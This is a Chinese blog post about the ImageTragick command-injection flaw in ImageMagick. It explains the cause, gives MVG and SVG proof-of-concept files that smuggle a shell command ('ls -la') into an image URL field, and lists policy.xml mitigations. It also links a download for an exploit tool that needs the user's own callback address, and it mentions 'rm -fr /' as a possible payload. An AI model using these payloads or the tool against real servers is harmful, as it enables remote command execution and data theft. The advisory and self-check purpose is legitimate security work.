上传个图片都能拿下服务器!赶紧自检!
作者:互联网
网站上的图片相关功能可以被***利用秒取网站服务器控制权!比如传一张图直接就给服务器关机,或执行 “rm -fr /” 删除文件,再或窃取用户敏感数据等,而造成这些后果的只是一张特殊的图片…
这个时候不得不喊出口号「睡你麻痹,起来 High」,上次 Struts 2 漏洞席卷全球还有余温,这次核弹级漏洞 ImageTragick 来了!赶紧检查自家服务,今夜别睡!
~~~~~~~~~~~~~~~
[紧急预警]
关于 ImageTragick 漏洞(官网):
https://imagetragick.com/
官网上已经给出了好几种测试姿势,比如:
ImageTragick 相关漏洞挖掘测试和漏洞影响自查,请参考:
http://www.imagemagick.org/script/api.php
可以看到数目繁多,用了如下组件的都可能受此漏洞影响:
~~~~~~~~~~~~~~~~~~~~~~~~
漏洞产生的原因是 ImageMagick 使用 system() 指令调用来处理 HTTPS 请求,而对用户传入的 shell 参数没有做好过滤,导致能注入任意指令执行。
EXPOLIT
exploit.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
exploit.svg
-=-=-=-=-=-=-=-=-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="SVG namespace" xmlns:xlink=
"XLink namespace">
<image xlink:href="https://example.com/image.jpg"|ls "-la"
x="0" y="0" height="640px" width="480px"/>
</svg>
$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
...
最后看一下,有那些网站今天被人搞了!!
~~~~~~~~~~~~~~~
临时防护建议(by imagetragick.com):
使用配置文件暂时禁用 ImageMagick 的部分编码器,可在 “/etc/ImageMagick/policy.xml” 文件中添加如下代码:
<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>
~~~~~~~~~~~~~~~~~~
说了半天不带工具,那不是刷流氓吗?
这个主要是php调用的,asp,aspx应当不影响,反正我测试了没成功,
需要自己修改上线地址
EXP下载链接
链接: http://pan.baidu.com/s/1c1Xhqvu 密码: bw5w
----------------------------------
标签:ImageMagick,ImageTragick,com,自检,漏洞,https,服务器,php,上传 来源: https://blog.51cto.com/u_15127542/2698996